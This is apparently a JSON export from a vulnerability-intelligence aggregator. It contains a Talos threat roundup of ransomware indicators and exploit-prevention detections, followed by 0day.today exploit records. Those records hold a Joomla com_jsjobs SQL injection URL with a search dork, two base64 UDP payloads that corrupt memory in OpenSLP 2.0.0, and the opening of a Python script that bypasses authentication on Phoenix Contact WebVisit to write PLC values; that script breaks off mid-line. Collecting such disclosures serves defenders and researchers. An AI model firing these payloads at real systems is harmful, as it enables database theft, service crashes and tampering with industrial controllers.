852ca255c72851fff39129f7e4ad946e28c1c3adfe73f099d034b511d0d4f0ab 8bed5fd8ee4415d50e0fcfa15697455737ec30e371b9cf59998f16b9df82d655 8ff205742a2e987be8743877e3832f704a3d8a428adeaa809a62a2da3d98284f 90971a6f3936154d1d42143075a74343307211738f60fd8dc2704b9b1092b9eb 91b52463d52c11f45b8bc6e833560f374b3c23943ef83a596de4c9c263e25601 945e8db2a3e172c1b4def44a627f31ec3d92027c2302ae6ca8426995a0d2f330 97ab941d4e212453c834739eecc62dc6b23a2737b7e99fdfd5e5bc2b1e677070 97b0052c9b458793345d76e6a445608f464eb17c15a4a3e1ac62ecc2b5e19c70 9abab9e192eba949efed12bf34d82b796b872954a8928695c6c2eb539d7a9994 9b57296d2b3a6e2d71d279e2f72a0c5764076e60db0decd1c933cea1ec68abbd 9be01433e0553992428c321e8ddb794697837e4266ebfcde8957190f175300d0 9bef202996bca3127c622f5b26c98bbe35ae6ef0aeea22f071517a4545c5daac 9c0d8b542bc6d349355dc8bff3d9f3436ec63033777b6ae2b7350b82a31f0b64 9c73a69c0eec3b51b0ede9d6ffdb4079c8f8ecab122dace2625d32f5a81794b1 9f6076a9aeff4a57d098390ff61e60b6a954ee545b8945fca5d39f4907de0e84 a0c2956a0dd44d0e177af551a6b3c0990a6d163f2d8e36a1b4370c667bf7bdd2 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-pB5aFhwb7bE/XbxfE89Fl2I/AAAAAAAAC4s/MbaVn96IVYg87L3yZWyxIEzW_J9dqck_QCLcBGAsYHQ/s1600/852ca255c72851fff39129f7e4ad946e28c1c3adfe73f099d034b511d0d4f0ab_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Shade-7357624-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xi ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Client Server Runtime Subsystem ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xVersion ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32 ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: shst ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: sh1 ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: shsnt ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xstate ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xcnt ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\DEBUG \nValue Name: ExceptionRecord ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xmode ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xpk ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\HOMEGROUP\\UISTATUSCACHE \nValue Name: OnlyMember ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: CleanShutdown ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: Generation ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5} \nValue Name: Data ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5} \nValue Name: Generation ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Data ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Generation ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Data ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Generation ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APPLETS\\SYSTRAY \nValue Name: Services ` | 6 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\NLASVC\\PARAMETERS\\INTERNET\\MANUALPROXIES ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CD BURNING\\DRIVES\\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: Drive Type ` | 6 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`76[.]73[.]17[.]194` | 5 \n`131[.]188[.]40[.]189` | 5 \n`208[.]83[.]223[.]34` | 4 \n`171[.]25[.]193[.]9` | 4 \n`86[.]59[.]21[.]38` | 3 \n`193[.]23[.]244[.]244` | 3 \n`194[.]109[.]206[.]212` | 3 \n`154[.]35[.]32[.]5` | 3 \n`128[.]31[.]0[.]39` | 3 \n`83[.]142[.]225[.]126` | 1 \n`137[.]74[.]19[.]202` | 1 \n`195[.]154[.]237[.]147` | 1 \n`81[.]17[.]17[.]131` | 1 \n`198[.]16[.]70[.]10` | 1 \n`5[.]9[.]116[.]66` | 1 \n`62[.]151[.]180[.]62` | 1 \n`193[.]105[.]73[.]80` | 1 \n`176[.]31[.]103[.]150` | 1 \n`194[.]59[.]207[.]195` | 1 \n`146[.]185[.]189[.]197` | 1 \n`144[.]76[.]143[.]137` | 1 \n`87[.]193[.]208[.]14` | 1 \n`98[.]128[.]172[.]233` | 1 \n`87[.]121[.]98[.]43` | 1 \n`141[.]157[.]13[.]229` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\README1.txt` | 12 \n`\\README10.txt` | 12 \n`\\README2.txt` | 12 \n`\\README3.txt` | 12 \n`\\README4.txt` | 12 \n`\\README5.txt` | 12 \n`\\README6.txt` | 12 \n`\\README7.txt` | 12 \n`\\README8.txt` | 12 \n`\\README9.txt` | 12 \n`%ProgramData%\\System32\\xfs` | 11 \n \n#### File Hashes\n\n` 26da7d57ec1798ddcdc4f016f4eb0752a6e1ecd5481091dc523ea01175093d8d 2a68d908566be84208cdb2f8f7d91e333690f9caee7e3f2e910483612c5a5046 5d7a85f85865277795519e6e7b5f656cf9904ed6dcdbb6d901482c47594cea7b 68daf44d57a4d13701eb66b637a00cc6931fb913515a7c95dec3a318c0365968 6f387364a1ebaebef7dc40f5bc1bf8200206b140e27050ff3f41fe6fb46c6b7f 7699113e80abe023018877fd18e3b39a29b26a21cd7dfcef06cbe9c0f9595cff 9714f035f6458b4496dd0e1362eded1eca6214ee35768b1e2f615124671b52e3 985418b9d311ec5b3f386204c2f65342856b90c5617fcbb1bf50bf1ae13ec3f1 b7005d089d4e060ea4528dbca67236924bb2310c0b214d3f74e0961effda7da4 b9bd26c9291c769620dd003b63619c10b741495bbef133d488dc877634cda0bc d48ef74859fc77868492c43758d01f618c2af1d007e570d3848fe1d5a246e10c deaa2c5a65617ca09fd4d84a268febc8ecdd660307a5fe576bbd10833d045de1 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-UCq2LBdJiG4/XbxhYZ7RguI/AAAAAAAAC44/JS8SudPVLcgtFwDOqZDqex713wrb-3gPwCLcBGAsYHQ/s1600/68daf44d57a4d13701eb66b637a00cc6931fb913515a7c95dec3a318c0365968_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (57939) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nAtom Bombing code injection technique detected \\- (2838) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nKovter injection detected \\- (410) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nExcessively long PowerShell command detected \\- (354) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nProcess hollowing detected \\- (313) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (137) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (95) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (93) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nPowerShell file-less infection detected \\- (46) \nA PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families. \nFusion adware detected \\- (29) \nFusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware. \n \n", "modified": "2019-11-01T10:31:45", "published": "2019-11-01T10:31:45", "id": "TALOSBLOG:6631705A9B0F56348E3E1A97469105A1", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/bUEZpje_8WQ/threat-roundup-1025-1101.html", "type": "talosblog", "title": "Threat Roundup for October 25 to November 1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-12-04T07:46:53", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-08-12T00:00:00", "published": "2019-08-12T00:00:00", "id": "1337DAY-ID-33105", "href": "https://0day.today/exploit/description/33105", "title": "Joomla JS Jobs Component (com_jsjobs) 1.2.5 - cities.php SQL Injection Vulnerability", "type": "zdt", "sourceData": "#Exploit Title: Joomla! component com_jsjobs - SQL Injection\r\n#Dork: inurl:\"index.php?option=com_jsjobs\"\r\n#Exploit Author: qw3rTyTy\r\n#Vendor Homepage: https://www.joomsky.com/\r\n#Software Link: https://www.joomsky.com/5/download/1\r\n#Version: 1.2.5\r\n#Tested on: Debian/nginx/joomla 3.9.0\r\n#####################################\r\n#Vulnerability details:\r\n#####################################\r\nVulnerable code is in line 296 in file site/models/cities.php\r\n\r\n 291\t function isCityExist($countryid, $stateid, $cityname){\r\n 292\t if (!is_numeric($countryid))\r\n 293\t return false;\r\n 294\t\r\n 295\t $db = $this->getDBO();\r\n 296\t\t$query = \"SELECT id,name,latitude,longitude FROM `#__js_job_cities` WHERE countryid=\" . $countryid . \" AND LOWER(name) = '\" . strtolower($cityname) . \"'\";\t//!!!\r\n 297\t\r\n 298\t if($stateid > 0){\r\n 299\t $query .= \" AND stateid=\".$stateid;\r\n 300\t }else{\r\n 301\t $query .= \" AND (stateid=0 OR stateid IS NULL)\";\r\n 302\t\t}\r\n 303\t\t\r\n 305\t $db->setQuery($query);\r\n 306\t $city = $db->loadObject();\r\n 307\t if ($city != null)\r\n 308\t return $city;\r\n 309\t else\r\n 310\t return false;\r\n 311\t }\r\n 312\t\r\n 313\t}\r\n\r\n#####################################\r\n#PoC:\r\n#####################################\r\nhttp://localhost/index.php?option=com_jsjobs&task=cities.savecity&citydata=%27%20UNION%20SELECT%20*%20FROM%20(SELECT%20user())%20AS%20a%20JOIN%20(SELECT%20version())%20as%20b%20JOIN%20(SELECT%20database())%20as%20c%20JOIN%20(SELECT%20%27woot%27)%20as%20d--%20,Canada\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33105"}, {"lastseen": "2018-11-12T06:53:07", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2018-11-09T00:00:00", "published": "2018-11-09T00:00:00", "id": "1337DAY-ID-31559", "href": "https://0day.today/exploit/description/31559", "title": "OpenSLP 2.0.0 - Multiple Vulnerabilities", "type": "zdt", "sourceData": "OpenSLP 2.0.0 - Multiple Vulnerabilities\r\n\r\n==========================\r\n \r\nI discovered some bugs in openslp-2.0.0 back in January, 2018. \r\nOne of them I disclosed in June (dumpco.re/blog/openslp-2.0.0-double-free),\r\nand today I'm disclosing two more.\r\n \r\n \r\nBUG 1\r\n=====\r\n \r\nThis issue is an OOB read that does not crash the application.\r\nSo in terms of exploitation it is not very interesting. If that's what\r\nyou're here for then scroll down to bug#2.\r\nAfter the occurence of the bug the application actually detects the error\r\nand ignores the malicious packet. Therefore, it could be argued that this\r\nis not a bug at all. Nevertheless, here it is:\r\n \r\nProof of concept exploit:\r\n \r\n echo -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d > /dev/udp/127.0.0.1/427\r\n \r\nValgrind report:\r\n \r\n ==27968== Invalid read of size 1\r\n ==27968== at 0x412436: GetUINT16 (slp_message.c:63)\r\n ==27968== by 0x4159C7: v2ParseSrvReg (slp_v2message.c:327)\r\n ==27968== by 0x4159C7: SLPv2MessageParseBuffer (slp_v2message.c:1005)\r\n ==27968== by 0x40BF4A: SLPDProcessMessage (slpd_process.c:1393)\r\n ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)\r\n ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)\r\n ==27968== by 0x40256B: main (slpd_main.c:699)\r\n ==27968== Address 0x5b5c3f1 is 0 bytes after a block of size 81 alloc'd\r\n ==27968== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\r\n ==27968== by 0x40FC1C: SLPBufferAlloc (slp_buffer.c:67)\r\n ==27968== by 0x40FCBA: SLPBufferDup (slp_buffer.c:139)\r\n ==27968== by 0x40BF7F: SLPDProcessMessage (slpd_process.c:1383)\r\n ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)\r\n ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)\r\n ==27968== by 0x40256B: main (slpd_main.c:699)\r\n \r\nAnalysis:\r\n \r\nv2ParseSrvReg is responsible for parsing incoming requests. Various bytes\r\nare read from the packet and interpreted as integers used as length fields.\r\nOne of them is the scopelistlen, parsed on line 321, and further used as\r\nargument for the amount of bytes to increment the buffer->curpos pointer\r\nin the the GetStrPtr function, shown below on line 112. It now points to\r\nuninitialized memory.\r\n \r\nThe OOB read occurs in GetUINT16, called on line 327 where the buffer->curpos \r\npointer is dereferenced.\r\n \r\nSubsequently the comparison on line 329 evaluates to true since the\r\nbuffer->curpos now points to memory located after the buffer->end\r\npointer. The application therefore stops processing the malicious packet.\r\n \r\n 291 static int v2ParseSrvReg(SLPBuffer buffer, SLPSrvReg * srvreg)\r\n 292 {\r\n 293 int result;\r\n 294\r\n 295 /* 0 1 2 3\r\n 296 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\r\n 297 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 298 | <URL-Entry> \\\r\n 299 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 300 | length of service type string | <service-type> \\\r\n 301 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 302 | length of <scope-list> | <scope-list> \\\r\n 303 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 304 | length of attr-list string | <attr-list> \\\r\n 305 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 306 |# of AttrAuths |(if present) Attribute Authentication Blocks...\\\r\n 307 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */\r\n 308\r\n 309 /* Parse the <URL-Entry>. */\r\n 310 result = v2ParseUrlEntry(buffer, &srvreg->urlentry);\r\n 311 if (result != 0)\r\n 312 return result;\r\n 313\r\n 314 /* Parse the <service-type> string. */\r\n 315 srvreg->srvtypelen = GetUINT16(&buffer->curpos);\r\n 316 srvreg->srvtype = GetStrPtr(&buffer->curpos, srvreg->srvtypelen);\r\n 317 if (buffer->curpos > buffer->end)\r\n 318 return SLP_ERROR_PARSE_ERROR;\r\n 319\r\n 320 /* Parse the <scope-list> string. */\r\n 321 srvreg->scopelistlen = GetUINT16(&buffer->curpos);\r\n 322 srvreg->scopelist = GetStrPtr(&buffer->curpos, srvreg->scopelistlen);\r\n 323 if (buffer->curpos > buffer->end)\r\n 324 return SLP_ERROR_PARSE_ERROR;\r\n 325\r\n 326 /* Parse the <attr-list> string. */\r\n 327 srvreg->attrlistlen = GetUINT16(&buffer->curpos);\r\n 328 srvreg->attrlist = GetStrPtr(&buffer->curpos, srvreg->attrlistlen);\r\n 329 if (buffer->curpos > buffer->end)\r\n 330 return SLP_ERROR_PARSE_ERROR;\r\n \r\n 54 /** Extract a 16-bit big-endian buffer value into a native 16-bit word.\r\n 55 *\r\n 56 * @param[in,out] cpp - The address of a pointer from which to extract.\r\n 57 *\r\n 58 * @return A 16-bit unsigned value in native format; the buffer pointer\r\n 59 * is moved ahead by 2 bytes on return.\r\n 60 */\r\n 61 uint16_t GetUINT16(uint8_t ** cpp)\r\n 62 {\r\n 63 uint16_t rv = AS_UINT16(*cpp);\r\n 64 *cpp += 2;\r\n 65 return rv;\r\n 66 }\r\n ...\r\n 96 /** Extract a string buffer address into a character pointer.\r\n 97 *\r\n 98 * Note that this routine doesn't actually copy the string. It only casts\r\n 99 * the buffer pointer to a character pointer and moves the value at @p cpp\r\n 100 * ahead by @p len bytes.\r\n 101 *\r\n 102 * @param[in,out] cpp - The address of a pointer from which to extract.\r\n 103 * @param[in] len - The length of the string to extract.\r\n 104 *\r\n 105 * @return A pointer to the first character at the address pointed to by\r\n 106 * @p cppstring pointer; the buffer pointer is moved ahead by @p len bytes\r\n 107 * on return.\r\n 108 */\r\n 109 char * GetStrPtr(uint8_t ** cpp, size_t len)\r\n 110 {\r\n 111 char * sp = (char *)*cpp;\r\n 112 *cpp += len;\r\n 113 return sp;\r\n 114 }\r\n \r\n \r\nProof of discovery: \r\n \r\n $ echo -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d | sha256sum\r\n 0d3f7a6e45a59def9097db4f103f95e4af2560bdb25853f9ee1c2e758c7d4946 -\r\n \r\ntwitter.com/magnusstubman/status/953909628622069760\r\n \r\n \r\nPatch:\r\n \r\nI'm not aware of any patch, and I'm not sure the maintainers are going to patch it.\r\n \r\nBUG 2\r\n=====\r\n \r\nFirst and foremost, I'm not claiming credit for this bug since it was\r\napparently discovered by Reno Robert and publicly disclosed on the\r\noss-security mailing list on 2016-09-27 and awarded CVE-2016-7567\r\nthe day after.\r\n \r\nopenwall.com/lists/oss-security/2016/09/27/4\r\nopenwall.com/lists/oss-security/2016/09/28/1\r\n \r\nAnyhow, I wasn't aware of the issue and found it by fuzzing, so I\r\nreported it to the maintainers who made me aware of the earlier discovery.\r\nWhat puzzled me was that no announcement had been made and the fact that\r\nthe latest stable version on their website is still vulnerable! I found it\r\n2017-12-06 and reported it 2018-01-18. See further down for proof of\r\ndiscovery.\r\n \r\nI havn't been able to find any exploit for this bug anywhere. Therefore,\r\nI'm today disclosing a proof-of-concept exploit for the bug to increase\r\nattention on the issue.\r\n \r\nExploit:\r\n \r\n echo -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d > /dev/udp/127.0.0.1/427\r\n \r\nValgrind report:\r\n \r\n ==56913== Invalid write of size 1\r\n ==56913== at 0x4C2D6A3: [email\u00a0protected]_2.2.5 (vg_replace_strmem.c:914)\r\n ==56913== by 0x40FD0B: SLPFoldWhiteSpace (slp_compare.c:210)\r\n ==56913== by 0x4100DC: SLPCompareString (slp_compare.c:374)\r\n ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514)\r\n ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550)\r\n ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220)\r\n ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431)\r\n ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94)\r\n ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406)\r\n ==56913== by 0x402383: main (slpd_main.c:699)\r\n ==56913== Address 0x5b5dd06 is 0 bytes after a block of size 6 alloc'd\r\n ==56913== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\r\n ==56913== by 0x415C51: _xmemdup (slp_xmalloc.c:356)\r\n ==56913== by 0x410096: SLPCompareString (slp_compare.c:365)\r\n ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514)\r\n ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550)\r\n ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220)\r\n ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431)\r\n ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94)\r\n ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406)\r\n ==56913== by 0x402383: main (slpd_main.c:699)\r\n \r\nThe while loop on line 207 fails to perform bounds checking, and as such\r\nmay end up incrementing the pointer p up to a point such that p is bigger\r\nthan ep. Thus, the third argument to memmove on line 2010 becomes negative.\r\nHowever, since memmove accepts a size_t (which is unsigned) the value wraps\r\naround and becomes UINT_MAX or close to UINT_MAX resulting in memmove\r\nattempting to move an excessive amount of memory, resulting in OOB write.\r\n \r\n 184 /** fold internal white space within a string.\r\n 185 *\r\n 186 * folds all internal white space to a single space character within a\r\n 187 * specified string. modified the @p str parameter with the result and\r\n 188 * returns the new length of the string.\r\n 189 *\r\n 190 * @param[in] len - the length in bytes of @p str.\r\n 191 * @param[in,out] str - the string from which extraneous white space\r\n 192 * should be removed.\r\n 193 *\r\n 194 * @return the new (shorter) length of @p str.\r\n 195 *\r\n 196 * @note this routine assumes that leading and trailing white space have\r\n 197 * already been removed from @p str.\r\n 198 */\r\n 199 static int slpfoldwhitespace(size_t len, char * str)\r\n 200 {\r\n 201 char * p = str, * ep = str + len;\r\n 202 while (p < ep)\r\n 203 {\r\n 204 if (isspace(*p))\r\n 205 {\r\n 206 char * ws2p = ++p; /* point ws2p to the second ws char. */\r\n 207 while (isspace(*p)) /* scan till we hit a non-ws char. */\r\n 208 p++;\r\n 209 len -= p - ws2p; /* reduce the length by extra ws. */\r\n 210 memmove(ws2p, p, ep - p); /* overwrite the extra white space. */\r\n 211 }\r\n 212 p++;\r\n 213 }\r\n 214 return (int)len;\r\n 215 }\r\n \r\nProof of discovery:\r\n \r\n $ echo -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d | sha256sum\r\n 5bba9f9410bd4dffa4dc119477153002002db3fdd26a97080e43bfd95aeadb24 -\r\n \r\ntwitter.com/magnusstubman/status/938317849474555904\r\n \r\nPatch: sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a \r\n \r\nREFERENCES\r\n==========\r\n \r\n- sourceforge.net/p/openslp/bugs/161\r\n- sourceforge.net/p/openslp/bugs/160\r\n- twitter.com/magnusstubman/status/938317849474555904\r\n- twitter.com/magnusstubman/status/953909628622069760\r\n- sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a\r\n- openwall.com/lists/oss-security/2016/09/27/4\r\n- openwall.com/lists/oss-security/2016/09/28/1\n\n# 0day.today [2018-11-12] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/31559"}, {"lastseen": "2018-10-13T22:49:43", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category web applications", "modified": "2018-10-12T00:00:00", "published": "2018-10-12T00:00:00", "id": "1337DAY-ID-31316", "href": "https://0day.today/exploit/description/31316", "title": "Phoenix Contact WebVisit 2985725 - Authentication Bypass Exploit", "type": "zdt", "sourceData": "# Exploit Title: Phoenix Contact WebVisit 2985725 - Authentication Bypass\r\n# Date: 2018-09-30\r\n# Exploit Author: Deneut Tijl\r\n# Vendor Homepage: www.phoenixcontact.com\r\n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5\r\n# Version: WebVisit (all versions)\r\n# CVE : CVE-2016-8380, CVE-2016-8371\r\n \r\n# Description\r\n# Script to read and write PLC tags via a Webvisit HMI page (even in case of a password protection)\r\n# Steps:\r\n# * Get Project Name: http://<ip>/\r\n# * Get list of tags: http://<ip>/<projectname>.tcr\r\n# * Get current values of tags: http://<ip>/cgi-bin/ILRReadValues.exe\r\n# * Set new tag values: http://<ip>/cgi-bin/writeVal.exe?<tag>+<value> (urlencode!)\r\n \r\n# CVE-2016-8380-SetPLCValues.py\r\n \r\n#! /usr/bin/env python\r\n \r\nimport urllib2\r\n \r\nstrIP = raw_input('Please enter an IP [192.168.1.200]: 